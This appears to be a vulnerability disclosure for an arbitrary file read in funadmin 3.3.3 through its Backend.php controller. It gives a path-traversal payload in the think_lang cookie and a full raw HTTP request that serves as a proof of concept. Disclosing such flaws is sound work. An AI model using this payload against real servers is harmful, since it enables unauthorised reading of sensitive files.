Description:
Arbitrary File Read Vulnerability exists in funadmin3.3.3 might allow attackers to read arbitrary files through web applications without being restricted by access control. This vulnerability may lead to sensitive information leakage, system crashes, and other issues. It can also read sensitive file information inside the computer.
replace think_lang=....; with think_lang=/../../../addons/shell;
such as :
Cookie: Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1715700076; think_lang=/../../../addons/shell; PHPSESSID=fe64bf5eac300a03bd3f52830990ae83;
Description: Arbitrary File Read Vulnerability exists in funadmin3.3.3 might allow attackers to read arbitrary files through web applications without being restricted by access control. This vulnerability may lead to sensitive information leakage, system crashes, and other issues. It can also read sensitive file information inside the computer.
Vulnerability Type: Arbitrary File Read Vulnerability
Affected component:
app/common/controller/Backend.php
Attack Vectors:
replace
think_lang=....
; withthink_lang=/../../../addons/shell;
such as :Cookie: Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1715700076; think_lang=/../../../addons/shell; PHPSESSID=fe64bf5eac300a03bd3f52830990ae83;
GET / HTTP/1.1 Host: 127.0.0.1:8022 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1715700076; think_lang=/../../../addons/shell; PHPSESSID=fe64bf5eac300a03bd3f52830990ae83; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1715701691 Connection: close